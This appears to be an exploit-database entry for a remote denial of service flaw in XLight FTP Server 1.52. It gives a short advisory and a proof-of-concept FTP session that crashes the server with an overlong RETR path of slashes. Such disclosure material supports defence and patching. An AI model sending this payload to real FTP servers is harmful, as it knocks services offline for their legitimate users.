header-logo
Suggest Exploit
vendor:
XLight FTP Server
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
20
CWE
Product Name: XLight FTP Server
Affected Version From: 1.52
Affected Version To: 1.52
Patch Exists: Yes
Related CWE: N/A
CPE: a:xlight_ftp_server:xlight_ftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Remote Denial of Service Vulnerability in XLight FTP Server

A remote denial of service vulnerability has been reported to exist in the Send File Request functionality of the XLight FTP server. Due to this issue a remote attacker may be able cause the affected server to crash, denying service to legitimate users. This issue is due to insufficient bounds checking. Upon successful exploitation an attacker may be able to cause the affected server to crash, denying service to legitimate users.

Mitigation:

Ensure that the FTP server is up to date with the latest security patches.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9668/info

A remote denial of service vulnerability has been reported to exist in the Send File Request functionality of the XLight FTP server. Due to this issue a remote attacker may be able cause the affected server to crash, denying service to legitimate users. This issue is due to insufficient bounds checking.

Upon successful exploitation an attacker may be able to cause the affected server to crash, denying service to legitimate users.

ftp> open
To www.example.com
Connected to www.example.com.
220 Xlight Server 1.52 ready...
User (www.example.com:(none)): test
331 Password required for test
Password:
230 Login OK.
ftp> literal pasv
227 Entering passive mode .
ftp> literal retr /////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
//////////////////////////////////////////qwer
Connection closed by remote host.

Navigation

Suggest Exploit

Services By CQR